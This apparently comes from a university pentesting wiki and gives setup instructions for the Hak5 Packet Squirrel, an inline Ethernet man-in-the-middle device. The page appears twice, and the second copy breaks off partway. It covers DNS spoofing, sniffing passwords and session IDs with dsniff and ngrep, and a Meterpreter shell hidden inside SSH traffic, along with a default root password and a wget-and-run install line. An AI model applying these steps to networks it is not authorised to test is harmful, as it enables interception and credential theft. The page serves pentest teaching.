If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
[[File:Packet squirrel meterpreter ssh.PNG |thumb|right|400px||Packet Squirrel Payload Meterpreter-via-SSH settings]]&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
[[File:Packet squirrel ispyintel.PNG |thumb|right|400px||Packet Squirrel Payload ISpyIntel settings]]&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6094</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6094"/>
		<updated>2021-03-09T15:23:12Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* ISpyintel */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. &lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
[[File:Packet squirrel meterpreter ssh.PNG |thumb|right|400px||Packet Squirrel Payload settings]]&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
[[File:Packet squirrel ispyintel.PNG |thumb|right|400px||Packet Squirrel Payload ISpyIntel settings]]&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
